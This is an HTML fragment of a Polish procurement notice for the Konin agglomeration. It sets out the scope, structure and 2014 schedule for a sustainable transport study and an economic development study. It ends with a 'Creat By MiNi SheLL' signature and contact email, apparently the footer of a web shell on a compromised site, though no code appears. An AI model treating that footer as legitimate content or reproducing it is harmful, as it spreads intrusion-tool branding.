<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny:
1. Studium powinno mieć charakter multimodalny, obejmujący wszystkie gałęzie transportu pasażerskiego i towarowego.
2.Syntetyczna diagnoza systemu transportowego:
-Uwarunkowania zewnętrze;
-Tendencje wpływające na rozwój transportu w regionie;
-Dostępność transportowa na tle kraju;
-Uwarunkowania wewnętrzne.
3Diagnoza strategiczna systemu transportu zbiorowego:
-Opis układu drogowego;
-Układ linii transportu zbiorowego (MZK, PKS, PKP);
-Charakterystyka organizatorów transportu zbiorowego;
-Ocena i prognoza potrzeb przewozowych;
-Finansowanie usług przewozowych;
-Preferencje dotyczące wyboru rodzaju środków transportu;
-Kierunki potencjalnych działań;
-Pożądany standard usług przewozowych w przewozach o charakterze użyteczności publicznej;
-Organizacja systemu informacji dla pasażerów
4.Charakterystyka transportu indywidualnego;
5.Śródlądowy transport wodny;
6.Rozwój lokalnego transportu lotniczego;
7.Charakterystyka transportu towarowego (centra przeładunkowe, działalność  logistyczna)
8.Budowa systemu ścieżek rowerowych i ruchu pieszych,
9.Organizacja i zarządzanie ruchem,
10. Bezpieczeństwo ruchu drogowego,
11. Badanie natężenia ruchu (na dworcu kolejowym, dworcu PKS, drogach krajowych, wojewódzkich i wybranych powiatowych przebiegających przez obszar aglomeracji;  50 punktów x 50 godzin) i badanie rentowności linii komunikacyjnych (min. 50 linii, dane płatne do pozyskania od przewoźników),
12.Wyniki przeprowadzonych wcześniej badań społecznych w ramach projektu,
13.Przebieg konsultacji społecznych,
14.Prognoza oddziaływania na środowisko Studium transportu zrównoważonego OFAK,
15.Analiza SWOT systemu transportu, 
16.Studium Rozwoju Transportu Zrównoważonego OFAK:
-Misja i wizja strategiczna oraz strategiczne obszary rozwojowe;
-Priorytety strategiczne;
-Cele strategiczne;
-Działania strategiczne;
-Narzędzia realizacji studium
-Podmioty realizujące studium
17.Tryb i zasady monitoringu i ewaluacji postępów wdrażania studium
Studium dodatkowo powinno dać odpowiedź na podstawowe cele:
-poprawa dostępności obszarów aktywności gospodarczej oraz budowa nowych obszarów aktywności gospodarczej (w tym produkcyjnej, logistycznej i pozostałej usługowej), w celu wykorzystania położenia Aglomeracji Konińskiej w centrum Polski, przy autostradzie A2 oraz linii kolejowej E20 (korytrarz TEN-T);
-integracja i modernizacja komunikacji miejskiej i PKS (w tym integracja taryfowa), 
z możliwością przystąpienia do systemu również innych przewoźników 
(np. prywatnych, wykonujących przewozy na zlecenie gmin i powiatu) - należy wykonać studium możliwości ekonomiczno-prawnych;
-poprawa jakości i dostępności do dworców i przystanków kolejowych 
(z wykorzystaniem komunikacji samochodowej, rowerowej i autobusowej), gdyż miejscowości Aglomeracji położone są pewnym oddaleniu od dworców.
Układ dokumentu powinien zawierać poniższe, podobne lub rozszerzone elementy:
1.Wstęp
2.Diagnoza systemu transportu - stan istniejący
3.Analiza SWOT
4.Polityka transportu (warianty polityki transportowej dla OFAK, cel generalny, cele szczegółowe oraz zasady realizacji polityki transportowej)
5.Określenie celów strategicznych 
6.Zrównoważony plan rozwoju transportu (identyfikacja możliwych działań do zrealizowania, ocena możliwości działań wraz z szacunkiem kosztów i analizą wielokryterialną oraz wybór działań do realizacji)
7.Prognoza oddziaływania na środowisko 
8.Określenie wartości docelowych wybranych wskaźników,
9.Tryb i zasady monitoringu i ewaluacji postępów wdrażania Studium. 

Harmonogram prac:
Realizacja Studium rozwoju transportu zrównoważonego OFAK od daty zawarcia umowy do 30 listopada 2014 r:
a.Przygotowanie oraz zaakceptowanie harmonogramu prac nad opracowaniem studium, propozycja ankiety na konsultacje społeczne oraz wstępna koncepcja zawartości studium (do 31 maja 2014 r.)
b.Opracowywanie studium oraz przeprowadzanie dialogu społecznego (czerwiec -  listopad 2014 r.)
c.Projekt opracowanego studium (do 31października 2014 r.)
d.Przedstawienie ostatecznej wersji studium rozwoju transportu zrównoważonego OFAK (do 30 listopada 2014 r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.22.00.00-0, 71.24.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie Studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych Obszaru Funkcjonalnego Aglomeracji Konińskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny:
1.Analiza rynku pracy w kontekście wzmocnienia usług i przedsiębiorczości,
2.Przeciwdziałanie wykluczeniu społecznemu mieszkańców regionu,
3.Opracowanie koncepcji terenów inwestycyjnych samorządów OFAK,
4.Analiza rynku edukacyjnego w kontekście zapotrzebowania na zawody,
5.Wielofunkcyjny rozwój obszarów wiejskich,
6.Środowisko przyrodnicze,
7.Uwarunkowania rozwoju:
-Tendencje rozwoju demograficznego i gospodarczego;
-Zagospodarowanie przestrzenne;
-Stan planistyczny; 
-Walory kulturowe i turystyczne;
-Stan i funkcjonowanie środowiska,
-Struktura własnościowa gruntów, 
-System transportowy; 
-Infrastruktura techniczna; 
-Opracowania planistyczne o znaczeniu europejskim, krajowym i regionalnym.
8.Kierunki zagospodarowania przestrzennego:
-Kierunki zmian w zagospodarowaniu przestrzennym;
-Kierunki i wskaźniki dotyczące zagospodarowania i użytkowania terenów,             w tym tereny wyłączone spod zabudowy; 
-Ochrona dziedzictwa kulturowego;
-Turystyka i rekreacja np. walory wód termalnych, 
-Ochrona środowiska i jego zasobów np. obszary chronione;
-Rozwój systemu transportowego;
-Rozwój infrastruktury technicznej (w tym: kanalizacja, wodociągi, ciepłownictwo, elektroenergetyka oraz gaz);
-Zasady rozmieszczenia inwestycji celu publicznego o znaczeniu lokalnym              i ponadlokalnym;
-Zasady kształtowania rolniczej i leśnej przestrzeni produkcyjnej;
-Obszary narażone na niebezpieczeństwo powodzi;
-Obszary wymagające rewitalizacji (tereny zdegradowane, poprzemysłowe);
-Obszary problemowe; 
-lanowanie przestrzenne; 
9.Realizacja polityki przestrzennej:
-Planowanie miejscowe,
-Gospodarowanie mieniem komunalnym,
-Programy operacyjne oraz projekty gminne i miejskie.
10.Promocja terenów inwestycyjnych np. wskazanie kierunków promocji dla poszczególnych regionów Obszaru Funkcjonalnego Aglomeracji Konińskiej
11.Wyniki przeprowadzonych badań społecznych, 
12.Przebieg konsultacji społecznych,
13.Prognoza oddziaływania na środowisko studium rozwoju gospodarczego OFAK wraz z programem promocji terenów inwestycyjnych OFAK,
14.Analiza SWOT systemu rozwoju gospodarczego 
15.Tryb i zasady monitoringu i ewaluacji postępów wdrażania studium

Układ dokumentu powinien zawierać poniższe, podobne lub rozszerzone elementy:
1.Wstęp
2.Diagnoza - stanu istniejącego
3.Część określająca uwarunkowania  (w formie tekstowej i graficznej)
4.Część tekstowa zawierająca ustalenia określające kierunki rozwoju gospodarczego OFAK,
5.Rysunek studium, przedstawiający w formie graficznej kierunki rozwoju gospodarczego OFAK,
6.Uzasadnienie zawierające objaśnienia przyjętych rozwiązań oraz syntezę ustaleń projektu studium.
7.Analiza SWOT
8.Program promocji terenów inwestycyjnych 
9.Prognoza oddziaływania na środowisko studium rozwoju gospodarczego wraz 
z programem promocji terenów inwestycyjnych,
10. Określenie wartości docelowych wybranych wskaźników 
 11. Tryb i zasady monitoringu i ewaluacji postępów wdrażania Studium. 

Harmonogram prac:
Realizacja Studium rozwoju gospodarczego OFAK wraz z programem promocji terenów inwestycyjnych OFAK od daty zawarcia umowy do 30 listopada 2014 r:
a.Przygotowanie oraz zaakceptowanie harmonogramu prac nad opracowaniem studium, propozycja ankiety na konsultacje społeczne oraz wstępna koncepcja zawartości studium (do 31 maja 2014 r.)
b.Opracowywanie studium oraz przeprowadzanie dialogu społecznego (czerwiec -  listopad 2014 r.)
c.Projekt opracowanego studium (do 31 października 2014 r.)
d.Przedstawienie ostatecznej wersji studium rozwoju gospodarczego OFAK wraz
z programem promocji terenów inwestycyjnych OFAK (do 30 listopada 2014 r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-9, 90.71.14.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com